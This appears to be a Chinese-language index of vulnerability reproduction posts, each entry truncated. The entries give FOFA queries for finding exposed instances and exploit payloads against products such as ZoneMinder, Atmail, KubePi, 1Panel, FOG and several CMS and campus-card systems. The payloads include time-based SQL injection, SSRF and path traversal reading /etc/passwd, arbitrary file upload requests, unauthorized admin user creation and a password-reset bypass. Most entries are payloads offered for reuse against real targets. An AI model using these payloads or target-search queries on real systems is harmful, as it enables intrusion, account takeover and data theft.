K35-1开源-Webuserlogin-RCE fofa语法: FOFA语法:body=“/upload/images/raisecom/back.gif” && title==“Web user login” 漏洞复现: payload: GET /vpn/list_base_config.ph
K34-1开源-ZoneMinder-SQL 漏洞复现: payload: /zm/index.php?sort=**if(now()=sysdate()%2Csleep(6)%2C0)**&order=desc&limit=20&view=request&request=watch&mid=1
K32-2开源-短视频直播打赏系统-任意文件上传 漏洞复现: payload: POST /admin/ajax/upload HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqVHC
K32-1开源-短视频直播打赏系统-SSRF 漏洞复现: payload: GET /caiji/get_curl?url=file:///etc/passwd HTTP/1.1 Host: Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1
K31-1开源-Atmail-SQL 漏洞复现: payload: POST /index.php/admin/index/login HTTP/1.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttp
K30-1开源-IP网络广播服务平台-任意文件上传 漏洞复现: payload: POST /api/v2/remote-upgrade/upload HTTP/1.1 Host: Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Wind
K29-1开源-FOG-InformationLeakage 漏洞复现: payload: 获取hostname curl -i -s -k -X $'POST' --data-binary $'file=/var/log/fog/fogscheduler.log&ip=<BASE64_SERVER
K28-1KubePi–PermissionAC 漏洞复现: payload: POST /kubepi/api/v1/users HTTP/1.1 Host: Content-Length: 248 Accept: application/json, text/plain, */* lang:
K27-1开源-Quicklancer-SQL 漏洞复现: payload: GET /listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1
K26-1开源-证书查询系统-任意文件读取 fofa语法: “/index/js/jquery.uls.data.js'” 漏洞复现: payload: GET /index/ajax/lang?lang=./application/database HTTP/1.1 Host: User-Age
K25-1开源-SpringBlade系统-SQL 漏洞描述: SpringBlade 后台框架 menu/list 存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系
K24-1开源-餐厅数字化综合管理平台-PermissionAC 漏洞复现: 点击忘记密码,动态口令随便填,下一步抓包修改code值为1 payload: 效果图: 直接修改密码即可
K22-2科迅-一卡通管理系统-SQL 漏洞复现: payload: GET /api/get_kq_tj_today?KaID=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows
K23-1开源-Bazarrswaggerui组件-任意文件读取 漏洞复现: payload: http://IP/api/swaggerui/static/././././././././etc/passwd
K22-1科迅-一卡通管理系统-SQL 漏洞复现: payload: GET /api/dormitoryHealthRanking?building=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1 Host: User-Agent: Mozilla
K21-1开源-1Panel面板-RCE 漏洞描述: 1Panel 是新一代的 Linux 服务器运维管理面板,用户可以通过 Web 图形界面轻松管理 Linux 服务器,实现主机监控、文件管理、数据库管理、容器管理等功能。且深度集成开源建站软件 WordPress 和 Halo. 影响版本: 专业
K20-1开源-fogproject系统-RCE 漏洞描述: FOG是一款克隆/成像/救援套件/库存管理系统。在版本低于1.5.10.34的情况下,FOG中的packages/web/lib/fog/reportmaker.class.php文件受到命令注入漏洞的影响,该漏洞存在于/fog/mana
K17-1开源-dedecms-任意文件上传 漏洞描述: Desdev DedeCMS(织梦内容管理系统)是中国卓卓网络(Desdev)公司的一套基于PHP的开源内容管理系统(CMS)。该系统具有内容发布、内容管理、内容编辑和内容检索等功能。 Desdev DedeCMS 5.7SP2版本中存在安全
K15-1开源-YzmCMS-RCE 漏洞描述: YzmCMS /pay/index/pay_callback.html接口存在远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统指令,写入后门文件,最终可获取服务器权限。 网站图片: fofa语法: app=“yzmcms” 漏洞复现
K14-1开源-热网无线监测系统-SQL 漏洞描述: 热网无线监测系统 SystemManager.asmx 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进
